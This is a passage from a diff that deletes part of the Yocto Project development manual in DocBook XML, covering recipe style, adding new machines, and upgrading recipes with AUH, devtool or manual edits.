-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
-                        that are specific to individual packages produced by
-                        a recipe, you should always use an override that
-                        specifies the name of the package.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Indentation:</emphasis>
-                        Use spaces for indentation rather than than tabs.
-                        For shell functions, both currently work.
-                        However, it is a policy decision of the Yocto Project
-                        to use tabs in shell functions.
-                        Realize that some layers have a policy to use spaces
-                        for all indentation.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Using Python for Complex Operations:</emphasis>
-                        For more advanced processing, it is possible to use
-                        Python code during variable assignments (e.g.
-                        search and replacement on a variable).</para>
-
-                        <para>You indicate Python code using the
-                        <filename>${@<replaceable>python_code</replaceable>}</filename>
-                        syntax for the variable assignment:
-                        <literallayout class='monospaced'>
-     SRC_URI = "ftp://ftp.info-zip.org/pub/infozip/src/zip${@d.getVar('PV',1).replace('.', '')}.tgz
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Shell Function Syntax:</emphasis>
-                        Write shell functions as if you were writing a shell
-                        script when you describe a list of actions to take.
-                        You should ensure that your script works with a generic
-                        <filename>sh</filename> and that it does not require
-                        any <filename>bash</filename> or other shell-specific
-                        functionality.
-                        The same considerations apply to various system
-                        utilities (e.g. <filename>sed</filename>,
-                        <filename>grep</filename>, <filename>awk</filename>,
-                        and so forth) that you might wish to use.
-                        If in doubt, you should check with multiple
-                        implementations - including those from BusyBox.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id="platdev-newmachine">
-        <title>Adding a New Machine</title>
-
-        <para>
-            Adding a new machine to the Yocto Project is a straightforward
-            process.
-            This section describes how to add machines that are similar
-            to those that the Yocto Project already supports.
-            <note>
-                Although well within the capabilities of the Yocto Project,
-                adding a totally new architecture might require
-                changes to <filename>gcc/glibc</filename> and to the site
-                information, which is beyond the scope of this manual.
-            </note>
-        </para>
-
-        <para>
-            For a complete example that shows how to add a new machine,
-            see the
-            "<ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-            section in the Yocto Project Board Support Package (BSP)
-            Developer's Guide.
-        </para>
-
-        <section id="platdev-newmachine-conffile">
-            <title>Adding the Machine Configuration File</title>
-
-            <para>
-                To add a new machine, you need to add a new machine
-                configuration file to the layer's
-                <filename>conf/machine</filename> directory.
-                This configuration file provides details about the device
-                you are adding.
-            </para>
-
-            <para>
-                The OpenEmbedded build system uses the root name of the
-                machine configuration file to reference the new machine.
-                For example, given a machine configuration file named
-                <filename>crownbay.conf</filename>, the build system
-                recognizes the machine as "crownbay".
-            </para>
-
-            <para>
-                The most important variables you must set in your machine
-                configuration file or include from a lower-level configuration
-                file are as follows:
-                <itemizedlist>
-                    <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_ARCH'>TARGET_ARCH</ulink></filename>
-                        (e.g. "arm")</para></listitem>
-                    <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'>PREFERRED_PROVIDER</ulink>_virtual/kernel</filename>
-                        </para></listitem>
-                    <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES'>MACHINE_FEATURES</ulink></filename>
-                        (e.g. "apm screen wifi")</para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                You might also need these variables:
-                <itemizedlist>
-                    <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SERIAL_CONSOLES'>SERIAL_CONSOLES</ulink></filename>
-                        (e.g. "115200;ttyS0 115200;ttyS1")</para></listitem>
-                    <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_IMAGETYPE'>KERNEL_IMAGETYPE</ulink></filename>
-                        (e.g. "zImage")</para></listitem>
-                    <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'>IMAGE_FSTYPES</ulink></filename>
-                        (e.g. "tar.gz jffs2")</para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                You can find full details on these variables in the reference
-                section.
-                You can leverage existing machine <filename>.conf</filename>
-                files from <filename>meta-yocto-bsp/conf/machine/</filename>.
-            </para>
-        </section>
-
-        <section id="platdev-newmachine-kernel">
-            <title>Adding a Kernel for the Machine</title>
-
-            <para>
-                The OpenEmbedded build system needs to be able to build a kernel
-                for the machine.
-                You need to either create a new kernel recipe for this machine,
-                or extend an existing kernel recipe.
-                You can find several kernel recipe examples in the
-                Source Directory at
-                <filename>meta/recipes-kernel/linux</filename>
-                that you can use as references.
-            </para>
-
-            <para>
-                If you are creating a new kernel recipe, normal recipe-writing
-                rules apply for setting up a
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>.
-                Thus, you need to specify any necessary patches and set
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'>S</ulink></filename>
-                to point at the source code.
-                You need to create a <filename>do_configure</filename> task that
-                configures the unpacked kernel with a
-                <filename>defconfig</filename> file.
-                You can do this by using a <filename>make defconfig</filename>
-                command or, more commonly, by copying in a suitable
-                <filename>defconfig</filename> file and then running
-                <filename>make oldconfig</filename>.
-                By making use of <filename>inherit kernel</filename> and
-                potentially some of the <filename>linux-*.inc</filename> files,
-                most other functionality is centralized and the defaults of the
-                class normally work well.
-            </para>
-
-            <para>
-                If you are extending an existing kernel recipe, it is usually
-                a matter of adding a suitable <filename>defconfig</filename>
-                file.
-                The file needs to be added into a location similar to
-                <filename>defconfig</filename> files used for other machines
-                in a given kernel recipe.
-                A possible way to do this is by listing the file in the
-                <filename>SRC_URI</filename> and adding the machine to the
-                expression in
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'>COMPATIBLE_MACHINE</ulink></filename>:
-                <literallayout class='monospaced'>
-     COMPATIBLE_MACHINE = '(qemux86|qemumips)'
-                </literallayout>
-                For more information on <filename>defconfig</filename> files,
-                see the
-                "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#changing-the-configuration'>Changing the Configuration</ulink>"
-                section in the Yocto Project Linux Kernel Development Manual.
-            </para>
-        </section>
-
-        <section id="platdev-newmachine-formfactor">
-            <title>Adding a Formfactor Configuration File</title>
-
-            <para>
-                A formfactor configuration file provides information about the
-                target hardware for which the image is being built and information that
-                the build system cannot obtain from other sources such as the kernel.
-                Some examples of information contained in a formfactor configuration file include
-                framebuffer orientation, whether or not the system has a keyboard,
-                the positioning of the keyboard in relation to the screen, and
-                the screen resolution.
-            </para>
-
-            <para>
-                The build system uses reasonable defaults in most cases.
-                However, if customization is
-                necessary, you need to create a <filename>machconfig</filename> file
-                in the <filename>meta/recipes-bsp/formfactor/files</filename>
-                directory.
-                This directory contains directories for specific machines such as
-                <filename>qemuarm</filename> and <filename>qemux86</filename>.
-                For information about the settings available and the defaults, see the
-                <filename>meta/recipes-bsp/formfactor/files/config</filename> file found in the
-                same area.
-            </para>
-
-            <para>
-                Following is an example for "qemuarm" machine:
-                <literallayout class='monospaced'>
-     HAVE_TOUCHSCREEN=1
-     HAVE_KEYBOARD=1
-
-     DISPLAY_CAN_ROTATE=0
-     DISPLAY_ORIENTATION=0
-     #DISPLAY_WIDTH_PIXELS=640
-     #DISPLAY_HEIGHT_PIXELS=480
-     #DISPLAY_BPP=16
-     DISPLAY_DPI=150
-     DISPLAY_SUBPIXEL_ORDER=vrgb
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='gs-upgrading-recipes'>
-        <title>Upgrading Recipes</title>
-
-        <para>
-            Over time, upstream developers publish new versions for software
-            built by layer recipes.
-            It is recommended to keep recipes up-to-date with upstream
-            version releases.
-        </para>
-
-        <para>
-            While several methods exist that allow you upgrade a recipe,
-            you might consider checking on the upgrade status of a recipe
-            first.
-            You can do so using the
-            <filename>devtool check-upgrade-status</filename> command.
-            See the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#devtool-checking-on-the-upgrade-status-of-a-recipe'>Checking on the Upgrade Status of a Recipe</ulink>"
-            section in the Yocto Project Reference Manual for more information.
-        </para>
-
-        <para>
-            The remainder of this section describes three ways you can
-            upgrade a recipe.
-            You can use the Automated Upgrade Helper (AUH) to set up
-            automatic version upgrades.
-            Alternatively, you can use <filename>devtool upgrade</filename>
-            to set up semi-automatic version upgrades.
-            Finally, you can manually upgrade a recipe by editing the
-            recipe itself.
-        </para>
-
-        <section id='gs-using-the-auto-upgrade-helper'>
-            <title>Using the Auto Upgrade Helper (AUH)</title>
-
-            <para>
-                The AUH utility works in conjunction with the
-                OpenEmbedded build system in order to automatically generate
-                upgrades for recipes based on new versions being
-                published upstream.
-                Use AUH when you want to create a service that performs the
-                upgrades automatically and optionally sends you an email with
-                the results.
-            </para>
-
-            <para>
-                AUH allows you to update several recipes with a single use.
-                You can also optionally perform build and integration tests
-                using images with the results saved to your hard drive and
-                emails of results optionally sent to recipe maintainers.
-                Finally, AUH creates Git commits with appropriate commit
-                messages in the layer's tree for the changes made to recipes.
-                <note>
-                    Conditions do exist when you should not use AUH to upgrade
-                    recipes and you should instead use either
-                    <filename>devtool upgrade</filename> or upgrade your
-                    recipes manually:
-                    <itemizedlist>
-                        <listitem><para>
-                            When AUH cannot complete the upgrade sequence.
-                            This situation usually results because custom
-                            patches carried by the recipe cannot be
-                            automatically rebased to the new version.
-                            In this case, <filename>devtool upgrade</filename>
-                            allows you to manually resolve conflicts.
-                            </para></listitem>
-                        <listitem><para>
-                            When for any reason you want fuller control over
-                            the upgrade process.
-                            For example, when you want special arrangements
-                            for testing.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-            </para>
-
-            <para>
-                The following steps describe how to set up the AUH utility:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Be Sure the Development Host is Set Up:</emphasis>
-                        You need to be sure that your development host is
-                        set up to use the Yocto Project.
-                        For information on how to set up your host, see the
-                        "<link linkend='dev-preparing-the-build-host'>Preparing the Build Host</link>"
-                        section.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Make Sure Git is Configured:</emphasis>
-                        The AUH utility requires Git to be configured because
-                        AUH uses Git to save upgrades.
-                        Thus, you must have Git user and email configured.
-                        The following command shows your configurations:
-                        <literallayout class='monospaced'>
-     $ git config --list
-                        </literallayout>
-                        If you do not have the user and email configured, you
-                        can use the following commands to do so:
-                        <literallayout class='monospaced'>
-     $ git config --global user.name <replaceable>some_name</replaceable>
-     $ git config --global user.email <replaceable>username</replaceable>@<replaceable>domain</replaceable>.com
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Clone the AUH Repository:</emphasis>
-                        To use AUH, you must clone the repository onto your
-                        development host.
-                        The following command uses Git to create a local
-                        copy of the repository on your system:
-                        <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/auto-upgrade-helper
-     Cloning into 'auto-upgrade-helper'...
-     remote: Counting objects: 768, done.
-     remote: Compressing objects: 100% (300/300), done.
-     remote: Total 768 (delta 499), reused 703 (delta 434)
-     Receiving objects: 100% (768/768), 191.47 KiB | 98.00 KiB/s, done.
-     Resolving deltas: 100% (499/499), done.
-     Checking connectivity... done.
-                        </literallayout>
-                        AUH is not part of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core (OE-Core)</ulink>
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>
-                        repositories.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Dedicated Build Directory:</emphasis>
-                        Run the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>
-                        script to create a fresh build directory that you
-                        use exclusively for running the AUH utility:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ source oe-init-build-env <replaceable>your_AUH_build_directory</replaceable>
-                        </literallayout>
-                        Re-using an existing build directory and its
-                        configurations is not recommended as existing settings
-                        could cause AUH to fail or behave undesirably.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Make Configurations in Your Local Configuration File:</emphasis>
-                        Several settings need to exist in the
-                        <filename>local.conf</filename> file in the build
-                        directory you just created for AUH.
-                        Make these following configurations:
-                        <itemizedlist>
-                            <listitem><para>
-                                If you want to enable
-                                <ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Build History</ulink>,
-                                which is optional, you need the following
-                                lines in the
-                                <filename>conf/local.conf</filename> file:
-                                <literallayout class='monospaced'>
-     INHERIT =+ "buildhistory"
-     BUILDHISTORY_COMMIT = "1"
-                                </literallayout>
-                                With this configuration and a successful
-                                upgrade, a build history "diff" file appears in
-                                the
-                                <filename>upgrade-helper/work/recipe/buildhistory-diff.txt</filename>
-                                file found in your build directory.
-                                </para></listitem>
-                            <listitem><para>
-                                If you want to enable testing through the
-                                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-testimage*'><filename>testimage</filename></ulink>
-                                class, which is optional, you need to have the
-                                following set in your
-                                <filename>conf/local.conf</filename> file:
-                                <literallayout class='monospaced'>
-     INHERIT += "testimage"
-                                </literallayout>
-                                <note>
-                                    If your distro does not enable by default
-                                    ptest, which Poky does, you need the
-                                    following in your
-                                    <filename>local.conf</filename> file:
-                                    <literallayout class='monospaced'>
-     DISTRO_FEATURES_append = " ptest"
-                                    </literallayout>
-                                </note>
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Optionally Start a vncserver:</emphasis>
-                        If you are running in a server without an X11 session,
-                        you need to start a vncserver:
-                        <literallayout class='monospaced'>
-     $ vncserver :1
-     $ export DISPLAY=:1
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create and Edit an AUH Configuration File:</emphasis>
-                        You need to have the
-                        <filename>upgrade-helper/upgrade-helper.conf</filename>
-                        configuration file in your build directory.
-                        You can find a sample configuration file in the
-                        <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/auto-upgrade-helper/tree/'>AUH source repository</ulink>.
-                        </para>
-
-                        <para>Read through the sample file and make
-                        configurations as needed.
-                        For example, if you enabled build history in your
-                        <filename>local.conf</filename> as described earlier,
-                        you must enable it in
-                        <filename>upgrade-helper.conf</filename>.</para>
-
-                        <para>Also, if you are using the default
-                        <filename>maintainers.inc</filename> file supplied
-                        with Poky and located in
-                        <filename>meta-yocto</filename> and you do not set a
-                        "maintainers_whitelist" or "global_maintainer_override"
-                        in the <filename>upgrade-helper.conf</filename>
-                        configuration, and you specify "-e all" on the
-                        AUH command-line, the utility automatically sends out
-                        emails to all the default maintainers.
-                        Please avoid this.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                This next set of examples describes how to use the AUH:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Upgrading a Specific Recipe:</emphasis>
-                        To upgrade a specific recipe, use the following
-                        form:
-                        <literallayout class='monospaced'>
-     $ upgrade-helper.py <replaceable>recipe_name</replaceable>
-                        </literallayout>
-                        For example, this command upgrades the
-                        <filename>xmodmap</filename> recipe:
-                        <literallayout class='monospaced'>
-     $ upgrade-helper.py xmodmap
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Upgrading a Specific Recipe to a Particular Version:</emphasis>
-                        To upgrade a specific recipe to a particular version,
-                        use the following form:
-                        <literallayout class='monospaced'>
-     $ upgrade-helper.py <replaceable>recipe_name</replaceable> -t <replaceable>version</replaceable>
-                        </literallayout>
-                        For example, this command upgrades the
-                        <filename>xmodmap</filename> recipe to version
-                        1.2.3:
-                        <literallayout class='monospaced'>
-     $ upgrade-helper.py xmodmap -t 1.2.3
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Upgrading all Recipes to the Latest Versions and Suppressing Email Notifications:</emphasis>
-                        To upgrade all recipes to their most recent versions
-                        and suppress the email notifications, use the following
-                        command:
-                        <literallayout class='monospaced'>
-     $ upgrade-helper.py all
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Upgrading all Recipes to the Latest Versions and Send Email Notifications:</emphasis>
-                        To upgrade all recipes to their most recent versions
-                        and send email messages to maintainers for each
-                        attempted recipe as well as a status email, use the
-                        following command:
-                        <literallayout class='monospaced'>
-     $ upgrade-helper.py -e all
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Once you have run the AUH utility, you can find the results
-                in the AUH build directory:
-                <literallayout class='monospaced'>
-     ${BUILDDIR}/upgrade-helper/<replaceable>timestamp</replaceable>
-                </literallayout>
-                The AUH utility also creates recipe update commits from
-                successful upgrade attempts in the layer tree.
-            </para>
-
-            <para>
-                You can easily set up to run the AUH utility on a regular
-                basis by using a cron job.
-                See the
-                <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/auto-upgrade-helper/tree/weeklyjob.sh'><filename>weeklyjob.sh</filename></ulink>
-                file distributed with the utility for an example.
-            </para>
-        </section>
-
-        <section id='gs-using-devtool-upgrade'>
-            <title>Using <filename>devtool upgrade</filename></title>
-
-            <para>
-                As mentioned earlier, an alternative method for upgrading
-                recipes to newer versions is to use
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool upgrade</filename></ulink>.
-                You can read about <filename>devtool upgrade</filename> in
-                general in the
-                "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software'>Use <filename>devtool upgrade</filename> to Create a Version of the Recipe that Supports a Newer Version of the Software</ulink>"
-                section in the Yocto Project Application Development and the
-                Extensible Software Development Kit (eSDK) Manual.
-            </para>
-
-            <para>
-                To see all the command-line options available with
-                <filename>devtool upgrade</filename>, use the following help
-                command:
-                <literallayout class='monospaced'>
-     $ devtool upgrade -h
-                </literallayout>
-            </para>
-
-            <para>
-                If you want to find out what version a recipe is currently at
-                upstream without any attempt to upgrade your local version of
-                the recipe, you can use the following command:
-                <literallayout class='monospaced'>
-     $ devtool latest-version <replaceable>recipe_name</replaceable>
-                </literallayout>
-            </para>
-
-            <para>
-                As mentioned in the previous section describing AUH,
-                <filename>devtool upgrade</filename> works in a
-                less-automated manner than AUH.
-                Specifically, <filename>devtool upgrade</filename> only
-                works on a single recipe that you name on the command line,
-                cannot perform build and integration testing using images,
-                and does not automatically generate commits for changes in
-                the source tree.
-                Despite all these "limitations",
-                <filename>devtool upgrade</filename> updates the recipe file
-                to the new upstream version and attempts to rebase custom
-                patches contained by the recipe as needed.
-                <note>
-                    AUH uses much of <filename>devtool upgrade</filename>
-                    behind the scenes making AUH somewhat of a "wrapper"
-                    application for <filename>devtool upgrade</filename>.
-                </note>
-            </para>
-
-            <para>
-                A typical scenario involves having used Git to clone an
-                upstream repository that you use during build operations.
-                Because you are (or have) built the recipe in the past, the
-                layer is likely added to your configuration already.
-                If for some reason, the layer is not added, you could add
-                it easily using the
-                <ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'><filename>bitbake-layers</filename></ulink>
-                script.
-                For example, suppose you use the <filename>nano.bb</filename>
-                recipe from the <filename>meta-oe</filename> layer in the
-                <filename>meta-openembedded</filename> repository.
-                For this example, assume that the layer has been cloned into
-                following area:
-                <literallayout class='monospaced'>
-     /home/scottrif/meta-openembedded
-                </literallayout>
-                The following command from your
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                adds the layer to your build configuration (i.e.
-                <filename>${BUILDDIR}/conf/bblayers.conf</filename>):
-                <literallayout class='monospaced'>
-     $ bitbake-layers add-layer /home/scottrif/meta-openembedded/meta-oe
-     NOTE: Starting bitbake server...
-     Parsing recipes: 100% |##########################################| Time: 0:00:55
-     Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
-     Removing 12 recipes from the x86_64 sysroot: 100% |##############| Time: 0:00:00
-     Removing 1 recipes from the x86_64_i586 sysroot: 100% |##########| Time: 0:00:00
-     Removing 5 recipes from the i586 sysroot: 100% |#################| Time: 0:00:00
-     Removing 5 recipes from the qemux86 sysroot: 100% |##############| Time: 0:00:00
-                </literallayout>
-                For this example, assume that the <filename>nano.bb</filename>
-                recipe that is upstream has a 2.9.3 version number.
-                However, the version in the local repository is 2.7.4.
-                The following command from your build directory automatically
-                upgrades the recipe for you:
-                <note>
-                    Using the <filename>-V</filename> option is not necessary.
-                    Omitting the version number causes
-                    <filename>devtool upgrade</filename> to upgrade the recipe
-                    to the most recent version.
-                </note>
-                <literallayout class='monospaced'>
-     $ devtool upgrade nano -V 2.9.3
-     NOTE: Starting bitbake server...
-     NOTE: Creating workspace layer in /home/scottrif/poky/build/workspace
-     Parsing recipes: 100% |##########################################| Time: 0:00:46
-     Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
-     NOTE: Extracting current version source...
-     NOTE: Resolving any missing task queue dependencies
-            .
-            .
-            .
-     NOTE: Executing SetScene Tasks
-     NOTE: Executing RunQueue Tasks
-     NOTE: Tasks Summary: Attempted 74 tasks of which 72 didn't need to be rerun and all succeeded.
-     Adding changed files: 100% |#####################################| Time: 0:00:00
-     NOTE: Upgraded source extracted to /home/scottrif/poky/build/workspace/sources/nano
-     NOTE: New recipe is /home/scottrif/poky/build/workspace/recipes/nano/nano_2.9.3.bb
-                </literallayout>
-                Continuing with this example, you can use
-                <filename>devtool build</filename> to build the newly upgraded
-                recipe:
-                <literallayout class='monospaced'>
-     $ devtool build nano
-     NOTE: Starting bitbake server...
-     Loading cache: 100% |################################################################################################| Time: 0:00:01
-     Loaded 2040 entries from dependency cache.
-     Parsing recipes: 100% |##############################################################################################| Time: 0:00:00
-     Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
-     NOTE: Resolving any missing task queue dependencies
-            .
-            .
-            .
-     NOTE: Executing SetScene Tasks
-     NOTE: Executing RunQueue Tasks
-     NOTE: nano: compiling from external source tree /home/scottrif/poky/build/workspace/sources/nano
-     NOTE: Tasks Summary: Attempted 520 tasks of which 304 didn't need to be rerun and all succeeded.
-                </literallayout>
-                Within the <filename>devtool upgrade</filename> workflow,
-                opportunity exists to deploy and test your rebuilt software.
-                For this example, however, running
-                <filename>devtool finish</filename> cleans up the workspace
-                once the source in your workspace is clean.
-                This usually means using Git to stage and submit commits
-                for the changes generated by the upgrade process.
-            </para>
-
-            <para>
-                Once the tree is clean, you can clean things up in this
-                example with the following command from the
-                <filename>${BUILDDIR}/workspace/sources/nano</filename>
-                directory:
-                <literallayout class='monospaced'>
-     $ devtool finish nano meta-oe
-     NOTE: Starting bitbake server...
-     Loading cache: 100% |################################################################################################| Time: 0:00:00
-     Loaded 2040 entries from dependency cache.
-     Parsing recipes: 100% |##############################################################################################| Time: 0:00:01
-     Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
-     NOTE: Adding new patch 0001-nano.bb-Stuff-I-changed-when-upgrading-nano.bb.patch
-     NOTE: Updating recipe nano_2.9.3.bb
-     NOTE: Removing file /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano/nano_2.7.4.bb
-     NOTE: Moving recipe file to /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano
-     NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/nano as-is; if you no longer need it then please delete it manually
-                </literallayout>
-                Using the <filename>devtool finish</filename> command cleans
-                up the workspace and creates a patch file based on your
-                commits.
-                The tool puts all patch files back into the source directory
-                in a sub-directory named <filename>nano</filename> in this
-                case.
-            </para>
-        </section>
-
-        <section id='dev-manually-upgrading-a-recipe'>
-            <title>Manually Upgrading a Recipe</title>
-
-            <para>
-                If for some reason you choose not to upgrade recipes using the
-                <link linkend='gs-using-the-auto-upgrade-helper'>Auto Upgrade Helper (AUH)</link>
-                or by using
-                <link linkend='gs-using-devtool-upgrade'><filename>devtool upgrade</filename></link>,
-                you can manually edit the recipe files to upgrade the versions.
-                <note><title>Caution</title>
-                    Manually updating multiple recipes scales poorly and
-                    involves many steps.
-                    The recommendation to upgrade recipe versions is through
-                    AUH or <filename>devtool upgrade</filename>, both of which
-                    automate some steps and provide guidance for others needed
-                    for the manual process.
-                </note>
-            </para>
-
-            <para>
-                To manually upgrade recipe versions, follow these general steps:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Change the Version:</emphasis>
-                        Rename the recipe such that the version (i.e. the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                        part of the recipe name) changes appropriately.
-                        If the version is not part of the recipe name, change
-                        the value as it is set for <filename>PV</filename>
-                        within the recipe itself.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Update <filename>SRCREV</filename> if Needed:</emphasis>
-                        If the source code your recipe builds is fetched from
-                        Git or some other version control system, update
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                        to point to the commit hash that matches the new
-                        version.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Software:</emphasis>
-                        Try to build the recipe using BitBake.
-                        Typical build failures include the following:
-                        <itemizedlist>
-                            <listitem><para>
-                                License statements were updated for the new
-                                version.
-                                For this case, you need to review any changes
-                                to the license and update the values of
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
-                                and
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
-                                as needed.
-                                <note>
-                                    License changes are often inconsequential.
-                                    For example, the license text's copyright
-                                    year might have changed.
-                                </note>
-                                </para></listitem>
-                            <listitem><para>
-                                Custom patches carried by the older version of
-                                the recipe might fail to apply to the new
-                                version.
-                                For these cases, you need to review the
-                                failures.
-                                Patches might not be necessary for the new
-                                version of the software if the upgraded version
-                                has fixed those issues.
-                                If a patch is necessary and failing, you need
-                                to rebase it into the new version.
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Optionally Attempt to Build for Several Architectures:</emphasis>
-                        Once you successfully build the new software for a
-                        given architecture, you could test the build for
-                        other architectures by changing the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        variable and rebuilding the software.
-                        This optional step is especially important if the
-                        recipe is to be released publicly.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Check the Upstream Change Log or Release Notes:</emphasis>
-                        Checking both these reveals if new features exist that
-                        could break backwards-compatibility.
-                        If so, you need to take steps to mitigate or eliminate
-                        that situation.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Optionally Create a Bootable Image and Test:</emphasis>
-                        If you want, you can test the new software by booting
-                        it onto actual hardware.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Commit with the Change in the Layer Repository:</emphasis>
-                        After all builds work and any testing is successful,
-                        you can create commits for any changes in the layer
-                        holding your upgraded recipe.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='finding-the-temporary-source-code'>
-        <title>Finding Temporary Source Code</title>
-
-        <para>
-            You might find it helpful during development to modify the
-            temporary source code used by recipes to build packages.
-            For example, suppose you are developing a patch and you need to
-            experiment a bit to figure out your solution.
-            After you have initially built the package, you can iteratively
-            tweak the source code, which is located in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-            and then you can force a re-compile and quickly test your altered
-            code.
-            Once you settle on a solution, you can then preserve your changes
-            in the form of patches.
-        </para>
-
-        <para>
-            During a build, the unpacked temporary source code used by recipes
-            to build packages is available in the Build Directory as
-            defined by the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
-            variable.
-            Below is the default value for the <filename>S</filename> variable
-            as defined in the
-            <filename>meta/conf/bitbake.conf</filename> configuration file
-            in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>:
-            <literallayout class='monospaced'>
-     S = "${WORKDIR}/${BP}"
-            </literallayout>
-            You should be aware that many recipes override the
-            <filename>S</filename> variable.
-            For example, recipes that fetch their source from Git usually set
-            <filename>S</filename> to <filename>${WORKDIR}/git</filename>.
-            <note>
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BP'><filename>BP</filename></ulink>
-                represents the base recipe name, which consists of the name
-                and version:
-                <literallayout class='monospaced'>
-     BP = "${BPN}-${PV}"
-                </literallayout>
-            </note>
-        </para>
-
-        <para>
-            The path to the work directory for the recipe
-            (<ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>)
-            is defined as follows:
-            <literallayout class='monospaced'>
-     ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
-            </literallayout>
-            The actual directory depends on several things:
-            <itemizedlist>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>:
-                    The top-level build output directory.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></ulink>:
-                    The target system identifier.
